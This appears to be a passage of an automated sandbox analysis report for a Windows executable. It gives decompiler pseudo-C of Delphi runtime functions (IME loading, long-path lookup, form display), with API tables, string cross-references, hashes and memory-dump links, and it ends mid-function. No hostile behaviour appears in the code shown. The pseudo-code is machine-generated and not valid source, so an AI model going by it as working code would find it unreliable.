				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x48e85c; // 0x48f7f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x443d86);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x48fbb8 == 0) {
						 *0x48fbb8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x4719fc == 0) {
						 *0x4719fc = LoadLibraryA("IMM32.DLL");
						if( *0x4719fc != 0) {
							_t11 =  *0x4719fc; // 0x0
							 *0x48fbbc = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x4719fc; // 0x0
							 *0x48fbc0 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x4719fc; // 0x0
							 *0x48fbc4 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x4719fc; // 0x0
							 *0x48fbc8 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x4719fc; // 0x0
							 *0x48fbcc = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x4719fc; // 0x0
							 *0x48fbd0 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x4719fc; // 0x0
							 *0x48fbd4 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x4719fc; // 0x0
							 *0x48fbd8 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x4719fc; // 0x0
							 *0x48fbdc = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x4719fc; // 0x0
							 *0x48fbe0 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x443d8d);
					return SetErrorMode(_v8);
				}
			}

0x00443c21
0x00443c25
0x00443c2e
0x00443d90
0x00443c34
0x00443c3e
0x00443c43
0x00443c44
0x00443c49
0x00443c4c
0x00443c56
0x00443c6f
0x00443c6f
0x00443c7b
0x00443c8b
0x00443c97
0x00443ca2
0x00443cad
0x00443cb7
0x00443cc2
0x00443ccc
0x00443cd7
0x00443ce1
0x00443cec
0x00443cf6
0x00443d01
0x00443d0b
0x00443d16
0x00443d20
0x00443d2b
0x00443d35
0x00443d40
0x00443d4a
0x00443d55
0x00443d5f
0x00443d6a
0x00443d6a
0x00443c97
0x00443d71
0x00443d74
0x00443d77
0x00443d85
0x00443d85

APIs

SetErrorMode.KERNEL32(00008000), ref: 00443C39
GetModuleHandleA.KERNEL32(USER32,00000000,00443D86,?,00008000), ref: 00443C5D
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00443C6A
LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00443D86,?,00008000), ref: 00443C86
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00443CA8
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00443CBD
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00443CD2
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00443CE7
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00443CFC
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00443D11
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00443D26
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00443D3B
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00443D50
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00443D65
SetErrorMode.KERNEL32(?,00443D8D,00008000), ref: 00443D80

Strings

ImmSetCompositionWindow, xrefs: 00443D06
ImmGetConversionStatus, xrefs: 00443CC7
ImmReleaseContext, xrefs: 00443CB2
ImmGetCompositionStringA, xrefs: 00443D30
WINNLSEnableIME, xrefs: 00443C64
ImmNotifyIME, xrefs: 00443D5A
IMM32.DLL, xrefs: 00443C81
ImmSetCompositionFontA, xrefs: 00443D1B
ImmSetConversionStatus, xrefs: 00443CDC
ImmIsIME, xrefs: 00443D45
ImmSetOpenStatus, xrefs: 00443CF1
ImmGetContext, xrefs: 00443C9D
USER32, xrefs: 00443C58

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
API String ID: 3397921170-3271328588
Opcode ID: 4255e3025869c1075a1193b16d49dff0012d51cad6fab601df094ab62f6d82f0
Instruction ID: fb902e251235f175dbb9af0a75202c75039d8a9418a05cdd53d80fd9f9963354
Opcode Fuzzy Hash: 4255e3025869c1075a1193b16d49dff0012d51cad6fab601df094ab62f6d82f0
Instruction Fuzzy Hash: 233154F5E12340AEE300EF69DC66E1A37A8E704B05B21893FB505972A2D67C9950CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405AC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405AC0(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AAC(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AAC(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401310();
									while( *_t93 != 0) {
										_t90 = E00405AAC(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401310();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401318();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401310();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401318();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401310();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401310();
						}
					}
				}
				L17:
				return _v16;
			}

0x00405acc
0x00405acf
0x00405ad5
0x00405ae2
0x00405ae6
0x00405b28
0x00405b2e
0x00405b6b
0x00000000
0x00405b30
0x00405b37
0x00405b48
0x00405b4d
0x00405b53
0x00405b5b
0x00405b60
0x00405b6e
0x00405b70
0x00405b76
0x00405b7a
0x00405b81
0x00405b82
0x00405c2d
0x00405b94
0x00405b98
0x00405ba5
0x00405bac
0x00405bad
0x00405bb6
0x00405bb7
0x00405bcf
0x00405bd4
0x00405bd7
0x00405bdc
0x00405be2
0x00405be3
0x00405bf3
0x00405bf5
0x00405c05
0x00405c0c
0x00405c16
0x00405c17
0x00405c1c
0x00405c22
0x00405c23
0x00405c29
0x00405c2b
0x00000000
0x00405c2b
0x00405bf3
0x00405bd4
0x00000000
0x00405ba5
0x00405c39
0x00405c40
0x00405c44
0x00405c45
0x00405c45
0x00405b60
0x00405b4d
0x00405b37
0x00405ae8
0x00405af3
0x00405af7
0x00000000
0x00405af9
0x00405af9
0x00405b04
0x00405b08
0x00405b0d
0x00000000
0x00405b0f
0x00405b12
0x00405b19
0x00405b1d
0x00405b1e
0x00405b1e
0x00405b0d
0x00405af7
0x00405c4a
0x00405c53

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405ADD
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405AEE
lstrcpyn.KERNEL32(?,?,?,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B1E
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405B82
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001), ref: 00405BB7
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D), ref: 00405BCA
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000), ref: 00405BD7
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20), ref: 00405BE3
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C17
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C23
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C45

Strings

\, xrefs: 00405BF5
kernel32.dll, xrefs: 00405AD8
GetLongPathNameA, xrefs: 00405AE8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
Instruction ID: 296a13db2414833b3bf80d2bdfa437c82c634a9cd7f8270e4b53d567bb21fe4a
Opcode Fuzzy Hash: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
Instruction Fuzzy Hash: BD416072900619ABEB10DAA8CC85EDFB7EDDF44314F1405B7B949F7281D638AE408F68

Uniqueness

Uniqueness Score: -1.00%

Function 00454FF0, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00454FF0(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x45555a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x48e84c; // 0x41d0e4
					E00406520(_t294,  &_v12);
					E0040A0E8(_v12, 1);
					E00403D80();
				}
				_t149 =  *0x48fbfc; // 0x21d1310
				E004595C8(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x45553d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x455444);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x48fc00; // 0x21d0f1c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E004541DC(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043F370(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043F370(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044FE3C(E0043F370(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043F370(_v8), 0);
								} else {
									SetWindowPos(E0043F370(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043F370(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043C9EC(_v8);
						}
					} else {
						_push(_t372);
						_push(0x4550a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E00456820() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00456814() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x48fbfc; // 0x21d1310
								_t305 = E004386C0( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x48fbfc; // 0x21d1310
								_t248 = E00438704( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00453490(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00456850() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00456844() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x48fbfc; // 0x21d1310
										_t311 = E004386C0( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x48fbfc; // 0x21d1310
										_t269 = E00438704( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x48fbfc; // 0x21d1310
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44e7cc; // 0x44e818
									_t290 = E00403740( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E00456820() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00456814() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00453490(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043F370(_v8),  *(0x471b98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043F370(_v8),  *(0x471b98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406d00, E0043F370(_v8), 5, 0, _t220);
								E00438F1C();
							} else {
								_t231 = E0043F370(_v8);
								_t232 =  *0x48fbfc; // 0x21d1310
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043F370(_v8), 3);
							}
							_t226 =  *0x48fbfc; // 0x21d1310
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x455544);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}

0x00454ff1
0x00454ff3
0x00454ffb
0x00454ffe
0x00455003
0x00455004
0x00455009
0x0045500c
0x00455016
0x00455027
0x0045502c
0x0045503b
0x00455040
0x00455040
0x00455045
0x0045504a
0x00455052
0x0045505b
0x0045505c
0x00455061
0x00455064
0x0045506e
0x00455074
0x00455077
0x0045507e
0x00455422
0x00455423
0x00455428
0x0045542b
0x00455435
0x0045543f
0x0045545b
0x00455463
0x00455466
0x00455468
0x0045546d
0x0045546d
0x00455472
0x00455475
0x0045547c
0x0045548b
0x0045548e
0x00455495
0x004554b6
0x004554bb
0x004554c2
0x004554c7
0x004554c9
0x004554d4
0x004554d9
0x004554db
0x004554ea
0x004554ea
0x004554db
0x004554ec
0x004554ee
0x00455520
0x004554f0
0x00455508
0x0045550e
0x0045550e
0x00455497
0x004554af
0x004554af
0x0045547e
0x00455481
0x00455481
0x00455084
0x00455086
0x00455087
0x0045508c
0x0045508f
0x00455099
0x004550a3
0x004550c9
0x004550f5
0x0045513e
0x0045513e
0x00455141
0x00455143
0x00455145
0x00455145
0x00455155
0x00455155
0x00455158
0x0045515a
0x0045515c
0x0045515c
0x004550f7
0x004550f7
0x00455109
0x0045510c
0x0045510e
0x00455110
0x00455110
0x00455113
0x00455123
0x00455126
0x00455128
0x0045512a
0x0045512a
0x00455128
0x00455161
0x00455163
0x00455163
0x00455167
0x00455169
0x00455169
0x00455179
0x00455182
0x0045518f
0x00455198
0x00455198
0x004551a2
0x004551a5
0x004551b0
0x004551b3
0x00455287
0x00455289
0x0045528f
0x00455292
0x00455299
0x004552e2
0x004552e2
0x004552e5
0x004552e7
0x004552e9
0x004552e9
0x004552f9
0x004552f9
0x004552fc
0x004552fe
0x00455300
0x00455300
0x0045529b
0x0045529b
0x004552ad
0x004552ad
0x004552b0
0x004552b2
0x004552b4
0x004552b4
0x004552b7
0x004552c7
0x004552c7
0x004552ca
0x004552cc
0x004552ce
0x004552ce
0x004552cc
0x00455303
0x00455305
0x00455307
0x00455307
0x00455307
0x00455309
0x0045530b
0x0045530d
0x0045530d
0x0045530d
0x00455326
0x00455326
0x004551b9
0x004551b9
0x004551be
0x004551c1
0x004551c4
0x004551cb
0x004551d3
0x004551d9
0x004551de
0x004551e0
0x004551e5
0x004551e5
0x004551e0
0x004551e8
0x004551ea
0x00455223
0x00455223
0x00455226
0x00455228
0x0045522a
0x0045522a
0x0045523a
0x0045523a
0x0045523d
0x0045523f
0x00455241
0x00455241
0x004551ec
0x004551f2
0x004551f2
0x004551f5
0x004551f7
0x004551f9
0x004551f9
0x004551fc
0x00455205
0x00455205
0x00455208
0x0045520a
0x0045520c
0x0045520c
0x0045520f
0x0045520f
0x00455244
0x00455246
0x00455248
0x00455248
0x00455248
0x0045524a
0x0045524c
0x0045524e
0x0045524e
0x0045524e
0x0045525e
0x00455267
0x0045526d
0x00455270
0x00455274
0x0045527d
0x0045527d
0x00455274
0x004551b3
0x0045532f
0x00455340
0x00455416
0x00455346
0x00455350
0x004553a3
0x004553b7
0x004553b7
0x004553cc
0x004553d4
0x00455352
0x00455357
0x00455362
0x00455371
0x00455381
0x00455381
0x004553e2
0x004553f1
0x004553f1
0x00455340
0x0045507e
0x00455527
0x0045552a
0x0045552d
0x00455532
0x00455535
0x0045553c

APIs

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00455371

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadMessageSendString
String ID:
API String ID: 1946433856-0
Opcode ID: 39f0062770d71e082892c8cbb726ffb7484574a5ae4c4b0cfde5a815cb9704f4
Instruction ID: b3ea27c8242e0219a5722fe99f0ebfdc8d125783df85781ec40d31c2334c09d7
Opcode Fuzzy Hash: 39f0062770d71e082892c8cbb726ffb7484574a5ae4c4b0cfde5a815cb9704f4
Instruction Fuzzy Hash: D5F15E70A00A04EFD700DBA9D995BAE77F5AB04305F2541B6ED049B3A3D738EE49DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0044CA64, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405
nativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0044CA64(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44cf97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044BE10(E004140D0(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x48e6ec; // 0x48fbfc
								E004594D8( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
